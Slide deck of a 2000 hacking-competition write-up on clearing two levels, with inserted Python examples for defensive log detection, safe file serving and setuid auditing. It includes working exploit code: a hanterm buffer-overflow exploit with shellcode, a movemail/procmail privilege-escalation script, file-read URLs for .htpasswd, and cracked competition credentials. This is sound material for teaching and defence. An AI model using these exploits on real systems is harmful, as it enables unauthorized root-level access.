1st OlymFair Workshop Hacking technique
1
1st OlymFair Workshop: Hacking technique
  • Taeho Oh
  • ohhara@4dl.com
  • ohhara@postech.edu
  • http://postech.edu/~ohhara

2
Contents
  • How to pass level 1
  • How to pass level 2
  • Why did many hackers spend so much time on
    level 2?
  • About level 3
  • Conclusion

3
How to pass level 1 (1)
  • What to do?
  • Execute /cgi-bin/data/idaccess.cgi and obtain the
    way to reach level 2

4
How to pass level 1 (2)
  • Level 1 servers
  • 203.227.243.161
  • 203.227.243.162
  • 203.227.243.163

5
How to pass level 1 (3)
  • 203.227.243.161
  • OS: Solaris 8
  • Open TCP ports: 80, 8080

6
How to pass level 1 (4)
  • 203.227.243.162
  • OS: HP-UX 11.0
  • Open TCP ports: 22, 80, 8080

7
How to pass level 1 (5)
  • 203.227.243.163
  • OS: MS Windows 2000
  • Open TCP ports: 7, 9, 13, 17, 19, 25, 80, 135,
    139, 443, 1025, 1026, 1032, 1723, 3389

8
How to pass level 1 (6)
  • Attack 203.227.243.161
  • Port 80: Apache web server
  • Port 8080: Netscape Enterprise Server
  • The port 80 and port 8080 web servers share the
    same httpd home (document root) directory
  • Netscape Enterprise Server has a security bug

9
How to pass level 1 (7)
  • Netscape Enterprise Server security bug
  • I could see the files in a specific directory, as
    below:
  • http://203.227.243.161/?wp-cs-dump
  • You can also use ?wp-ver-info, ?wp-html-rend,
    ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link,
    ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
  • I could browse the directories and check whether
    a file exists
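Added example, not part of the original slides: a small Python detector that flags the wp-* query tokens listed above in web-server access logs. The token list is the one on this slide; the log lines, source hosts and timestamps below are constructed for the example, and the Common Log Format regex is an assumption about the log layout.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query tokens from the slide: Netscape Enterprise Server "web publishing"
# commands that trigger the directory-indexing bug.
NES_WP_TOKENS = {
    "wp-cs-dump", "wp-ver-info", "wp-html-rend", "wp-usr-prop", "wp-ver-diff",
    "wp-verify-link", "wp-start-ver", "wp-stop-ver", "wp-uncheckout",
}

# Common Log Format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Split one access-log line into its fields; None if it is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def wp_tokens_in(target):
    """Return the wp-* tokens carried by the request's query string.

    The tokens are sent as bare keys ("/?wp-cs-dump"), so blank values must be
    kept, and matching is case-insensitive.
    """
    query = urlsplit(target).query
    return {k.lower() for k, _ in parse_qsl(query, keep_blank_values=True)
            if k.lower() in NES_WP_TOKENS}


def detect_nes_probes(lines):
    """Return one record per request that carries a wp-* token.

    A 2xx status on such a request is the strong signal: the server honoured
    the command instead of rejecting it.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tokens = wp_tokens_in(rec["target"])
        if tokens:
            status = int(rec["status"])
            hits.append({
                "host": rec["host"],
                "time": rec["time"],
                "target": rec["target"],
                "status": status,
                "tokens": sorted(tokens),
                "served": 200 <= status < 300,
            })
    return hits


def probes_by_host(hits):
    """Count flagged requests per source host, most active first."""
    counts = {}
    for h in hits:
        counts[h["host"]] = counts.get(h["host"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample log lines (not from the slides); hosts and times are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Jun/2000:13:40:01 +0900] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.7 - - [30/Jun/2000:13:41:12 +0900] "GET /?wp-cs-dump HTTP/1.0" 200 2210',
    '10.0.0.7 - - [30/Jun/2000:13:41:20 +0900] "GET /cgi-bin/?wp-ver-info HTTP/1.0" 200 310',
    '10.0.0.7 - - [30/Jun/2000:13:41:33 +0900] "GET /cgi-bin/hackme/?WP-CS-DUMP&x=1 HTTP/1.0" 404 290',
    '10.0.0.9 - - [30/Jun/2000:13:42:00 +0900] "GET /data/idaccess.html?wp=1 HTTP/1.0" 401 0',
    'garbage that is not an access-log record',
]

if __name__ == "__main__":
    found = detect_nes_probes(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(probes_by_host(found))
```

Run over a real log, one host issuing several distinct wp-* commands in quick succession with 200 responses is the pattern to alert on; a single 404 is more likely a scanner that got nothing.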

10
How to pass level 1 (8)
  • The file list

/
+-- cgi-bin/
|   +-- data/            (can't access this directory)
|   +-- hackme/
|       +-- a
|       +-- a.c
|       +-- show_file.html
|       +-- showfile.cgi
+-- data/
+-- index.html
11
How to pass level 1 (9)
  • Read the .htaccess file with showfile.cgi
  • http://203.227.243.161/cgi-bin/hackme/showfile.cgi
    ?NAME=/cgi-bin/data/.htaccess
  • Read the .htpasswd file (its path is given in
    .htaccess) with showfile.cgi
  • http://203.227.243.161/cgi-bin/hackme/showfile.cgi
    ?NAME=/cgi-bin/data/.htpasswd
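Added example, not the competition's showfile.cgi (whose source is not on the slides): a Python sketch of the arbitrary-file-read behaviour the two URLs above imply, beside a reader that confines NAME to the document root and never serves dotfiles such as .htaccess or .htpasswd. The directory tree it builds, including the file contents, is constructed for the example; the assumption that the original CGI simply concatenated NAME onto its document root is inferred from the slide.

```python
import os
import tempfile


class NotAllowed(Exception):
    """Raised when a requested name must not be served."""


def read_file_unsafe(docroot, name):
    """Behaviour implied by the slides (assumed, not the real CGI): NAME is glued
    onto the document root and opened, so "/cgi-bin/data/.htaccess" is served
    verbatim, and so would "/../anything" be."""
    with open(docroot + name, "rb") as f:
        return f.read()


def safe_path(docroot, name):
    """Resolve NAME inside docroot; reject escapes, dotfiles and non-files."""
    root = os.path.realpath(docroot)
    # Leading slashes are stripped so an absolute NAME cannot bypass the join;
    # realpath collapses ".." and follows symlinks before the prefix check.
    candidate = os.path.realpath(os.path.join(root, name.lstrip("/")))
    if not candidate.startswith(root + os.sep):
        raise NotAllowed("escapes the document root: %r" % name)
    if not os.path.isfile(candidate):
        raise NotAllowed("not a regular file: %r" % name)
    rel = os.path.relpath(candidate, root)
    if any(part.startswith(".") for part in rel.split(os.sep)):
        raise NotAllowed("dotfiles (.htaccess, .htpasswd) are never served: %r" % name)
    return candidate


def read_file_safe(docroot, name):
    """Serve NAME only after safe_path() has accepted it."""
    with open(safe_path(docroot, name), "rb") as f:
        return f.read()


def demo():
    """Build a throwaway tree (constructed for this example) and exercise both readers."""
    base = tempfile.mkdtemp()
    docroot = os.path.join(base, "htdocs")
    os.makedirs(os.path.join(docroot, "cgi-bin", "data"))
    with open(os.path.join(docroot, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(docroot, "cgi-bin", "data", ".htaccess"), "w") as f:
        f.write("AuthUserFile /cgi-bin/data/.htpasswd\n")
    with open(os.path.join(base, "secret.txt"), "w") as f:  # lives outside the root
        f.write("outside the root")

    results = {
        "unsafe_htaccess": read_file_unsafe(docroot, "/cgi-bin/data/.htaccess"),
        "safe_index": read_file_safe(docroot, "/index.html"),
    }
    for name in ("/cgi-bin/data/.htaccess", "/../secret.txt",
                 "../secret.txt", "/cgi-bin/data"):
        try:
            read_file_safe(docroot, name)
            results[name] = "served"
        except NotAllowed:
            results[name] = "blocked"
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

The order of the checks matters: the prefix test runs on the fully resolved path, so a symlink inside the root that points outside it is rejected too, and the dotfile test runs on the path relative to the root rather than on the raw NAME, so encodings of the same name cannot slip past it.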

12
How to pass level 1 (10)
  • I could crack the encrypted password from
    .htpasswd with Crack
  • id / password: admin / banana
  • I could access the /cgi-bin/data directory with this
    id and password

13
How to pass level 1 (11)
  • I could get the way to go to level 2
  • http://203.227.243.161/data/idaccess.html
  • This page is the form that executes
    http://203.227.243.161/cgi-bin/data/idaccess.cgi
  • My serial number
  • KOR000321-961829513
  • My password
  • oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

14
How to pass level 1 (12)
  • Netscape Enterprise Server directory indexing
    vulnerability
  • See http://www.securityfocus.com/vdb/bottom.html?vid=1063

15
How to pass level 1 (13)
  • Netscape Enterprise Server directory indexing
    vulnerability patch information

The Directory Indexing feature can be turned off
via the Administration Interface. Selecting
Content Management -> Document Preferences and
changing Directory Indexing to "none" will
disable this feature. Also, manually editing the
file obj.conf will do the same. Conduct a search
for the following:

    Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"

and replace fn="index-common" with fn="send-error".
16
How to pass level 2 (1)
  • What to do?
  • Execute /home/forbidden/pass.cgi
  • The owner of this executable file is root
  • The group of this executable file is wizard
  • The permission is 0510
  • The wizard gid is needed to execute
    /home/forbidden/pass.cgi

17
How to pass level 2 (2)
  • Level 2 server
  • 203.227.243.164
  • 203.227.243.164
  • OS: Linux
  • Open TCP ports: 23, 81

18
How to pass level 2 (3)
  • Wizard setuid or setgid files

-r-sr-xr-x 1 wizard wizard  26309 Jan  4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard  47692 Mar 29  1999 /sbin/dump
-rwsr-xr-x 1 wizard wizard  10708 Apr 20  1999 /sbin/cardctl
-rws--x--x 1 wizard wizard   6148 May 15  1999 /usr/X11R6/bin/Xwrapper
-rws--x--x 1 wizard wizard 158180 May 14  1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard  33120 Mar 22  1999 /usr/bin/at
-rwsr-xr-x 1 wizard wizard   3208 Mar 23  1999 /usr/bin/disable-paste
-r-sr-x--- 1 wizard wizard  42652 Aug 31  1999 /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard  40060 Aug 31  1999 /usr/bin/startinnfeed
-r-sr-sr-x 1 wizard wizard  15816 Jan  7 07:41 /usr/bin/lpq
-r-sr-sr-x 1 wizard wizard  15608 Jan  7 07:41 /usr/bin/lpr
-r-sr-sr-x 1 wizard wizard  16248 Jan  7 07:41 /usr/bin/lprm
19
How to pass level 2 (4)
  • Wizard setuid or setgid files ( Cont. )

-rws--x--x 2 wizard wizard 517916 Apr  7  1999 /usr/bin/suidperl
-rws--x--x 2 wizard wizard 517916 Apr  7  1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 wizard wizard  64468 Apr  7  1999 /usr/bin/procmail
-rwsr-xr-x 1 wizard wizard  14036 Apr 16  1999 /usr/bin/rcp
-rwsr-xr-x 1 wizard wizard  10516 Apr 16  1999 /usr/bin/rlogin
-rwsr-xr-x 1 wizard wizard   7780 Apr 16  1999 /usr/bin/rsh
-rwxr-sr-x 1 wizard wizard  17832 May 14  1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 299364 Apr 20  1999 /usr/sbin/sendmail
-rwsr-xr-x 1 wizard wizard  16488 Mar 23  1999 /usr/sbin/traceroute
-rwsr-xr-x 1 wizard wizard  18040 Jan  8 05:24 /usr/sbin/userhelper
-rwxr-sr-x 1 wizard wizard   3860 Apr 20  1999 /sbin/netreport
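Added example, not part of the original slides: a Python parser for ls -l listings like the two slides above. It converts the mode string to numeric permission bits, reports which entries are setuid or setgid and who can execute them, and applies the same owner/group/other rule to the 0510 mode of /home/forbidden/pass.cgi described on slide 16. In the sample listing, the /bin/ls and pass.cgi lines are constructed (pass.cgi from the slide's description of owner, group and mode, with an invented size and date); the other lines are copied from the slides.

```python
import re
import stat

# ls -l layout: perm links owner group size month day year-or-time path
LS_RE = re.compile(
    r'^(?P<perm>[-dlcbps][-rwxsStT]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+'
    r'(?P<size>\d+)\s+\w{3}\s+\d{1,2}\s+\S+\s+(?P<path>\S+)$'
)

# Permission bits in the order the 9 mode characters appear.
_FLAGS = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
          stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
          stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)
# Special bits live in the execute positions of owner, group and other.
_SPECIAL = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}


def mode_bits(perm):
    """Convert a 10-character ls mode string to numeric permission bits.
    '-r-sr-xr-x' -> 0o4555, '-rwsr-sr-x' -> 0o6755, '-r-x--x---' -> 0o510."""
    bits = 0
    for i, ch in enumerate(perm[1:]):
        if ch in "rwx":
            bits |= _FLAGS[i]
        elif ch in "sStT":
            bits |= _SPECIAL[i]
            if ch in "st":  # lowercase: the execute bit is set as well
                bits |= _FLAGS[i]
    return bits


def parse_ls_line(line):
    """Return a dict with owner, group, size, mode and path, or None."""
    m = LS_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["mode"] = mode_bits(d.pop("perm"))
    d["size"] = int(d["size"])
    return d


def can_execute(mode, owner, group, user, user_groups):
    """Unix class selection: owner bits if you own the file, else group bits if
    you are in its group, else other bits. Root's override is ignored here."""
    if user == owner:
        return bool(mode & stat.S_IXUSR)
    if group in user_groups:
        return bool(mode & stat.S_IXGRP)
    return bool(mode & stat.S_IXOTH)


def audit_listing(lines):
    """Annotate every parsable entry with its setuid/setgid kinds and reach."""
    findings = []
    for line in lines:
        e = parse_ls_line(line)
        if e is None:
            continue
        m = e["mode"]
        kinds = [k for k, b in (("setuid", stat.S_ISUID),
                                ("setgid", stat.S_ISGID)) if m & b]
        if m & stat.S_IXOTH:
            reach = "anyone"
        elif m & stat.S_IXGRP:
            reach = "group " + e["group"]
        else:
            reach = "owner only"
        findings.append({"path": e["path"], "owner": e["owner"], "group": e["group"],
                         "mode": oct(m), "kinds": kinds, "reachable_by": reach})
    return findings


def privileged_entries(findings):
    """Keep only the setuid/setgid entries: the ones worth a second look."""
    return [f for f in findings if f["kinds"]]


LISTING = """\
-r-sr-xr-x 1 wizard wizard  26309 Jan  4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard  47692 Mar 29  1999 /sbin/dump
-rws--x--x 1 wizard wizard 158180 May 14  1999 /usr/X11R6/bin/hanterm
-rwxr-sr-x 1 wizard wizard  17832 May 14  1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard  64468 Apr  7  1999 /usr/bin/procmail
-rwxr-xr-x 1 root   root    12345 Jan  1  2000 /bin/ls
-r-x--x--- 1 root   wizard   4096 Jun 30  2000 /home/forbidden/pass.cgi
""".splitlines()  # last two lines constructed; the rest copied from the slides

if __name__ == "__main__":
    for f in privileged_entries(audit_listing(LISTING)):
        print(f["mode"], f["path"], f["kinds"], "reachable by", f["reachable_by"])
    print("level2 (group hackers) can run pass.cgi:",
          can_execute(0o510, "root", "wizard", "level2", {"hackers"}))
```

The audit reproduces the reasoning of the slides: every setuid wizard binary here is executable by anyone, which is why the search focused on them, while pass.cgi carries no special bit at all and is reachable only through membership in group wizard.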
20
How to pass level 2 (5)
  • Attack process
  • Get level2 shell
  • Get wizard euid
  • Get wizard uid
  • Create wizard uid, gid file
  • Get wizard gid
  • Execute pass.cgi
21
How to pass level 2 (6)
  • level2 shell -> wizard euid
  • Exploit hanterm bug

I have no name!@level2 ... hanterm -hfn `perl -e "print 'A'x240"`
can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
I have no name!@level2 ... hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
I have no name!@level2 ...
22
How to pass level 2 (7)
  • level2 shell -> wizard euid (Cont.)
  • This is a classical buffer overflow bug
  • I could get a wizard-euid shell with a buffer size of
    260 and an offset of -450

23
How to pass level 2 (8)
  • Exploit code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET       -450
#define RET_POSITION 260
#define RANGE        20
#define NOP          0x90

char shellcode[1024] =
  "\xeb\x1f"               /* jmp 0x1f            */
  "\x5e"                   /* popl %esi           */
  "\x89\x76\x08"           /* movl %esi,0x8(%esi) */
24
How to pass level 2 (9)
  • Exploit code (Cont.)

  "\x31\xc0"               /* xorl %eax,%eax      */
  "\x88\x46\x07"           /* movb %eax,0x7(%esi) */
  "\x89\x46\x0c"           /* movl %eax,0xc(%esi) */
  "\xb0\x0b"               /* movb $0xb,%al       */
  "\x89\xf3"               /* movl %esi,%ebx      */
  "\x8d\x4e\x08"           /* leal 0x8(%esi),%ecx */
  "\x8d\x56\x0c"           /* leal 0xc(%esi),%edx */
  "\xcd\x80"               /* int $0x80           */
  "\x31\xdb"               /* xorl %ebx,%ebx      */
  "\x89\xd8"               /* movl %ebx,%eax      */
25
How to pass level 2 (10)
  • Exploit code (Cont.)

  "\x40"                   /* inc %eax            */
  "\xcd\x80"               /* int $0x80           */
  "\xe8\xdc\xff\xff\xff"   /* call -0x24          */
  "/bin/sh";               /* .string "/bin/sh"   */

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

int main(int argc,char **argv)
{
26
How to pass level 2 (11)
  • Exploit code (Cont.)

  char buff[RET_POSITION+RANGE+1],*ptr;
  long *addr_ptr,addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
  int i;

  if(argc>1)
    offset=atoi(argv[1]);
  sp=get_sp();
  addr=sp-offset;
  ptr=buff;
27
How to pass level 2 (12)
  • Exploit code (Cont.)

  /* fill the whole buffer with the guessed return address */
  addr_ptr=(long *)ptr;
  for(i=0;i<bsize;i+=4)
    *(addr_ptr++)=addr;
  /* NOP sled in front, shellcode just before the return addresses */
  for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
    buff[i]=NOP;
  ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
  for(i=0;i<strlen(shellcode);i++)
    *(ptr++)=shellcode[i];
  buff[bsize-1]='\0';
28
How to pass level 2 (13)
  • Exploit code (Cont.)

  /* the crafted string is passed as the -hfn (font name) argument */
  execl("/usr/X11R6/bin/hanterm","hanterm","-hfn",buff,(char *)0);
  return 0;
}
29
How to pass level 2 (14)
  • wizard euid -> wizard uid

I have no name!@level2 ... cat > a.c
main()
{
  setreuid(501,501);
  execl("/bin/sh","sh",0);
}
I have no name!@level2 ... gcc a.c; ./a.out
wizard@level2 ... whoami
wizard
wizard@level2 ...
30
How to pass level 2 (15)
  • wizard uid -> create wizard uid, gid file
  • The movemail program is a wizard setgid program
  • The output file of the movemail program gets the
    wizard gid

wizard@level2 ... echo haha > test1
wizard@level2 ... movemail test1 test2
wizard@level2 ... ls -l test1 test2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r-- 1 wizard wizard  5 Jul 10 02:03 test2
wizard@level2 ... cat test2
haha
31
How to pass level 2 (16)
  • wizard uid, gid file -> wizard gid
  • procmail can execute an arbitrary shell command
    with the wizard uid and gid when the user can create
    a file owned by the wizard uid and gid

32
How to pass level 2 (17)
  • Exploit code

#!/bin/sh
PATH=$PATH:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main()
{
  setreuid(501,501);
  setregid(501,501);
  execl("/bin/sh","sh",0);
}
EOF
33
How to pass level 2 (18)
  • Exploit code (Cont.)

gcc shh.c -o shh
movemail shh shh2
cat > proc << EOF
:0
| /bin/chmod 6777 /tmp/shh2
EOF
34
How to pass level 2 (19)
  • Exploit code (Cont.)

movemail proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2
35
How to pass level 2 (20)
  • wizard gid -> execute pass.cgi

Congratulation!! You have passed Level 2.
Your ID: KOR000321-961829513
Initial Pass Time Stamp: 2000-06-30 13:59:30 GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering. Please attack and acquire
adminstrator's privilege. And then change the index.html
under level3 server.
Level 3 Login ID: level3
Level 4 Login Passwd: olymfair3
36
Why did many hackers spend so much time on
level 2? (1)
  • Almost all hackers tried to find a security bug
  • However, level 2 can be cleared not with a bug but
    with a feature (except for the hanterm bug)

37
Why did many hackers spend so much time on
level 2? (2)
  • The /sbin/dump program has a buffer overflow bug,
    and no exploit has been released
  • Many hackers tried to exploit this program.
    However, exploitation is impossible because the main
    function does not return but calls exit

38
Why did many hackers spend so much time on
level 2? (3)
  • The /usr/bin/lprm exploit code generates a
    segmentation fault message
  • The segmentation fault message is not generated
    by /usr/bin/lprm. The message is generated by the
    /usr/bin/lprm exploit code. It's a bug in the
    exploit code.

39
About level 3
  • I consumed much time, so I had no time to attack
    level 3
  • I tried to scan the level 3 server
  • However, I can't find an open TCP port
  • I didn't try to attack level 3 from then on
  • It seemed to take much time

40
Conclusion
  • It was an interesting hacking competition